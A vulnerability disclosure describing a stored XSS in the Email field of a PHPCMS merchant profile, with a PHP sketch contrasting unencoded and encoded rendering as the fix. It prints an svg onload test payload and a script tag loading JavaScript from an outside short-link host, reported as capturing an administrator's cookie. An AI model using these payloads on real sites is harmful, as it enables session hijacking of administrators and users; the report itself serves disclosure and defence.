Detailed Description:
Demo + local demo
The XSS is in the Email field of My Profile, under Merchant Information in the Business Center (a roundabout way to describe it). Arbitrary characters are not strictly filtered there, so I entered "/><svg onload=alert (/1/) > directly as the Email, as you can see.
Then click Submit; the operation is reported as successful.
Then visit our enterprise homepage, where the alert box pops up.
Then look at the page source: the input has been stored, so this is a stored XSS.
I originally wanted to check the admin backend, but the demo does not provide a backend demonstration, so I had to set up a local installation. In the local backend the payload does not fire directly in the admin panel, but when an administrator reviewing members opens the member's enterprise page, the alert box pops up.
Then continue with: "/><script src=http://t.cn/rz4oi2b></script> and, after submitting, see whether cookies can be captured.
As you can see, the cookie was captured successfully.
Proof of vulnerability:
Fix solution:
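As an added example (generic PHP, not taken from the report and not PHPCMS's own code), the sketch below shows the stored Email value rendered without encoding next to a hardened form that validates on submit and encodes on output. The function names are hypothetical, and it assumes the value is rendered inside a double-quoted HTML attribute, as the "/> prefix of the test string suggests.

```php
<?php
// Added example: generic PHP, not PHPCMS code. All function names are hypothetical.

// Input side: accept only a syntactically valid address of sane length.
function validate_profile_email(string $raw): ?string
{
    $email = trim($raw);
    if ($email === '' || strlen($email) > 254) {
        return null;
    }
    $ok = filter_var($email, FILTER_VALIDATE_EMAIL);
    return $ok === false ? null : $ok;
}

// Behaviour described in the report: the stored value is concatenated
// into markup as-is, so a leading "/> closes the attribute and the tag.
function render_email_unsafe(string $stored): string
{
    return '<input type="text" name="email" value="' . $stored . '" />';
}

// Output side: encode for the HTML context on every render. This is the
// control that matters, because a syntactically valid address may still
// carry quote or angle-bracket characters in a quoted local part.
function render_email_safe(string $stored): string
{
    $safe = htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="email" value="' . $safe . '" />';
}

// Constructed sample inputs; the second is the test string from the report.
$samples = [
    'merchant@example.com',
    '"/><svg onload=alert (/1/) >',
];

foreach ($samples as $raw) {
    $accepted = validate_profile_email($raw);
    echo 'input:    ', $raw, PHP_EOL;
    echo 'accepted: ', $accepted === null ? 'no (rejected at submit)' : 'yes', PHP_EOL;
    echo 'unsafe:   ', render_email_unsafe($raw), PHP_EOL;
    // Encoding is applied even to rejected input, to show that values
    // already stored before the fix still render inertly.
    echo 'safe:     ', render_email_safe($raw), PHP_EOL, PHP_EOL;
}
```

Marking the session cookie HttpOnly additionally keeps script from reading it, which limits the cookie capture shown in the last step.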
PHPCMS: a stored XSS (demo + local demo)